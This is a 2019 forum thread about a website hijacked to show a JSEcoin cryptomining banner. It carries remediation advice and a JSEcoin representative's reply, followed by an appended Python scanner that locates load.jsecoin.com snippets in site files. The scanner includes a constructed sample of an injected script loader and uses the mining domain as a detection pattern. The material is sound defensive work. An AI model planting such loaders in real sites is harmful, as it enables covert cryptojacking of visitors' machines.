This topic contains 21 replies, has 1 voice, and was last updated by James 2 months, 2 weeks ago.
March 4, 2019 at 11:01 am #8267
I would like to contact you as we have been hacked with a banner of yours on our entire website. We are trying to contact your support but are not able to.
As shown in the comments below we tried the plugin thing and we tried to look where the script is but we are not able to find it.
Could you please help us or provide us a solution to solve the issue?
March 4, 2019 at 12:18 pm #8268
Use a Content Security Policy on your site.
It’s not a way to remove scripts like JSE, but it prevents XSS, meaning that JSE domains can no longer send content to your site, your user’s browser will block it, so the JSE stuff will not be visible for your users and mining will be prevented.
Basically, it is just a list of allowed domains which can send information to your site: everything else will be blocked.
March 4, 2019 at 1:13 pm #8269
Joanna, there are a number of plugins/addons that have added the JSEcoin snippet to their code (which is very wrong if you ask me). When you subsequently use that plugin/addon, you are mining/displaying advertisements. Perhaps you can search for a script with anything similar to:
https://load.jsecoin.com/load...
and find out this way which script affects your site. Otherwise, provide your website URL here so other people can search through your website for the JSEcoin script.
You can also try the answer of Marc, although this will work, it will not entirely solve the problem.
March 4, 2019 at 1:35 pm #8270
I think the logical way to prevent situations like this in the future, is that JSE stops allowing codes registered to domain A to be used for domain B.
Now that Coinhive will stop, all amateur hackers need to find an alternative, and JSE looks like a logical choice. It is just a matter of time till one of these imbeciles finds a way to prevent the JSE banner from showing up.
March 4, 2019 at 1:46 pm #8271
Yes, I completely agree with you on this one @Marc. I remember that they explained it would be too much of a hassle for us -the publishers- to implement this, as some publishers have thousands of websites. Perhaps @james, you can reconsider this, as it is really strange that plugins can be used to mine for JSEcoin / display advertisements without the website owner knowing. There must be a workaround possible for the publishers that have thousands of websites?
March 4, 2019 at 2:05 pm #8272
JSE likes to exaggerate a bit, they say they have 20.000+ websites registered for mining.
But the daily distribution is around 288.000 coins or so…
Some simple maths: divide 288.000 coins by 20.000 websites, and you have the average earnings for each site.
You see my point? I think there are not more than a couple of hundreds (maybe thousands if there are enough web masters who are happy with 10 coins/day) legitimate sites using JSE. And unfortunately some hackers too…
March 6, 2019 at 2:54 pm #8280
The 20,000 sites is the number of individual siteID’s that have been generated using the publisher setup. I agree this isn’t perfectly accurate but it’s not intentionally there to exaggerate. Same with the users, the user ID’s are just auto-incremental from 1 – 149000 so we say we have 149k users but some don’t log in any more, some were duplicate accounts, some are suspended etc.
Anyway on to the point in hand. Anyone using the jsecoin code in a plugin needs to get the webmaster’s permission to use the mining, otherwise we get problems like this which is bad for everyone. In this case however the header PHP file actually had the snippet hard coded into it which sounds more like a hack 🙁
Hopefully we aren’t going to become a monetization platform for hackers like Coinhive if we take action quickly before the 7 day pending period is over, which in this case it was. Also the opt-in banner is very obvious and hackers generally prefer discreetness.
I sent details via LinkedIn to Joanna but I’ll repeat it here in case anyone else has an issue:-
“Hi, is it a WordPress or flat html site?
If it’s a WordPress site it could be one of the plugins. Clear your optin data here: https://server.jsecoin.com/optclear/
Then try disabling them individually until the opt-in notification stops appearing. Could you let me know what plugin it was if this is the case.
If it’s a flat HTML site search the code for load.jsecoin.com and remove that entire code snippet from <script> tag to </script> tag. Again if you wouldn’t mind sharing the URL I can take a look.
If the site has actually been hacked or someone has included the code in a plugin without getting the webmaster’s permission then we can suspend their account. Apologies for this. If there’s anything else I can do to help let me know.”
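The search described in the post above (look for load.jsecoin.com and locate the snippet from `<script>` tag to `</script>` tag), as an added example that is not part of the thread and not JSEcoin's code. It reports line ranges rather than deleting anything; the function names, the list of file extensions and the sample header are assumptions constructed for illustration.

```python
import os
import re

DOMAIN = "load.jsecoin.com"  # host named in the thread
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)
EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")  # assumed file types

# Constructed sample of a tampered theme header (not the real JSEcoin snippet).
SAMPLE_HEADER = """<?php wp_head(); ?>
<script type="text/javascript">
var s=document.createElement("script"); document.head.appendChild(s);
s.src="https://load.jsecoin.com/load/CONSTRUCTED-PLACEHOLDER/";
</script>
<script src="/js/site.js"></script>
<?php $u = "//load.jsecoin.com/CONSTRUCTED-PLACEHOLDER"; ?>
"""


def find_snippets(text):
    """Return (kind, first_line, last_line) for every reference to DOMAIN."""
    hits, covered = [], []
    for m in SCRIPT_RE.finditer(text):
        if DOMAIN in m.group(0).lower():
            span = tuple(text.count("\n", 0, i) + 1 for i in (m.start(), m.end()))
            hits.append(("script-block", *span))
            covered.append(span)
    # Mentions outside a complete <script> block, e.g. a tag assembled in PHP.
    for n, line in enumerate(text.splitlines(), 1):
        if DOMAIN in line.lower() and not any(a <= n <= b for a, b in covered):
            hits.append(("loose-reference", n, n))
    return hits


def scan_tree(root):
    """Walk root; return {relative_path: hits} for files that mention DOMAIN."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_snippets(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


if __name__ == "__main__":
    print(find_snippets(SAMPLE_HEADER))
```

Run `scan_tree()` against a copy of the web root (themes and plugins included); a `loose-reference` hit in a plugin file points at code that builds the tag at runtime.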